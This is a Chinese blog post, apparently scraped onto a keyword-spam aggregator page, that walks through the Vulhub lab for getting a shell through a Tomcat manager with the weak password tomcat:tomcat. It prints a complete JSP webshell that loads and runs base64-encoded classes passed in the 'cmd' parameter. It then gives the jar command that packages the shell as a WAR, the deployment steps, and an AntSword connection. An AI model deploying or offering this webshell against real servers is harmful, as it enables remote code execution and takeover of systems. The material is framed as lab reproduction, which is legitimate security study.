当前位置: 首页 > news >正文

合肥市庐阳区住房和城乡建设局网站奢侈品网站建设方案

合肥市庐阳区住房和城乡建设局网站,奢侈品网站建设方案,中国移动智慧社区,邢台哪儿专业做网站感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 后台getshell漏洞漏洞评级高… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞扫描3、漏洞验证 说明内容漏洞编号漏洞名称Tomcat7 弱口令 后台getshell漏洞漏洞评级高危影响范围Tomcat 版本8.0漏洞描述Tomcat 支持在后台部署 war 文件可以直接将 webshell 部署到 web 目录下。其中欲访问后台需要对应用户有相应权限tomcat8中默认没有任何用户且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下才可以进行攻击修复方案 1.1、漏洞描述 Tomcat 支持在后台部署 war 文件可以直接将 webshell 部署到 web 目录下。其中欲访问后台需要对应用户有相应权限 Tomcat7权限分为 manager后台管理 manager-gui 拥有html页面权限manager-status 拥有查看status的权限manager-script 拥有text接口的权限和status权限manager-jmx 拥有jmx权限和status权限 host-manager虚拟主机管理 admin-gui 拥有html页面权限admin-script 拥有text接口权限 这些权限的究竟有什么作用详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html 在conf/tomcat-users.xml文件中配置用户的权限 ?xml version1.0 encodingUTF-8? tomcat-users xmlnshttp://tomcat.apache.org/xmlxmlns:xsihttp://www.w3.org/2001/XMLSchema-instancexsi:schemaLocationhttp://tomcat.apache.org/xml tomcat-users.xsdversion1.0role rolenamemanager-gui/role rolenamemanager-script/role rolenamemanager-jmx/role rolenamemanager-status/role rolenameadmin-gui/role rolenameadmin-script/user usernametomcat passwordtomcat rolesmanager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script //tomcat-users可见用户tomcat拥有上述所有权限密码是tomcat。 正常安装的情况下tomcat8中默认没有任何用户且manager页面只允许本地IP访问。只有管理员手工修改了这些属性的情况下才可以进行攻击。 1.2、漏洞等级 高危 1.3、影响版本 Tomcat 版本8.0 1.4、漏洞复现 1、基础环境 PathVulhub/tomcat/tomcat8 启动测试环境 sudo docker-compose up -d访问http://your-ip:8080/即可看到 点击Manager App即可跳到管理登陆页面 输入用户名密码 tomcat:tomcat来到管理界面 2、漏洞扫描 3、漏洞验证 登录到后台后可以通过部署war包进行getshell 找一个a.jsp木马 %!class U extends ClassLoader {U(ClassLoader c){super(c);}public Class g(byte[] b){return super.defineClass(b,0,b.length);}}public byte[] base64Decode(String str) throws Exception{try{Class clazz Class.forName(sun.misc.BASE64Decoder);return (byte[]) clazz.getMethod(decodeBuffer,String.class).invoke(clazz.newInstance(),str);}catch (Exception e){Class clazz Class.forName(java.util.Base64);Object decoder clazz.getMethod(getDecoder).invoke(null);return(byte[])decoder.getClass().getMethod(decode,String.class).invoke(decoder,str);}} % % String cls request.getParameter(cmd);if(cls ! null){new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } % 打包成war包 jar cvf tomcat.war a.jsp上传打包的tomcat.war 生成一个tomcat的路径 在地址栏路径中访问http://192.168.80.141:8080/tomcat/a.jsp 蚁剑连接密码cmd
http://www.dnsts.com.cn/news/178896.html

相关文章:

  • wordpress 站点维护租用云服务器一年大概的费用
  • 社区论坛自助建站网小豪自助建站
  • 广州设计企业网站ai效果图网站
  • 温州企业网站建设泉州网站制作设计
  • 网站制作布局网站 选项卡 图标
  • 有什么网站是做投资的太原北京网站建设公司
  • 菏泽做网站优化的中国建设银行招聘网站
  • 做自己视频教程的网站室内设计联盟官方app
  • 企业网站seo策略最吉利旺财的建筑公司名字
  • 可以做家教的网站有哪些app引流推广软件
  • 洪梅做网站网站排名优化原理
  • 网站怎么申请支付宝接口抖音短视频代运营公司
  • 微网站什么意思详情页生成器
  • 网站制作前言公司装修室内设计效果图
  • 佛山网站建设价格多少电商网站有哪些
  • 网站的中英文切换怎么做的百年建筑网站
  • 新wordpress仿站人力招聘网站建设
  • 网站布局设计自适应摄影作品网站风景
  • 自适应网站模板公司广东广州免费建站
  • 专门做网页设计网站百度推广登录平台app
  • 建外卖网站网站建设需要摊销吗
  • 四川网站建设哪家专业网站建设+青海
  • 长春网站开发推荐建设网站卡盟
  • 网站模板如何修改怎么做产品的网站
  • 辽宁做网站哪家好设计制作效果图
  • 网站建设标书html怎么发布网页
  • 网上停车场做施工图人员网站wordpress后台空白
  • 申请网站域名空间网站 被黑
  • sem是什么?南阳网站seo公司
  • 泸州免费做网站北京网站优化公司哪家好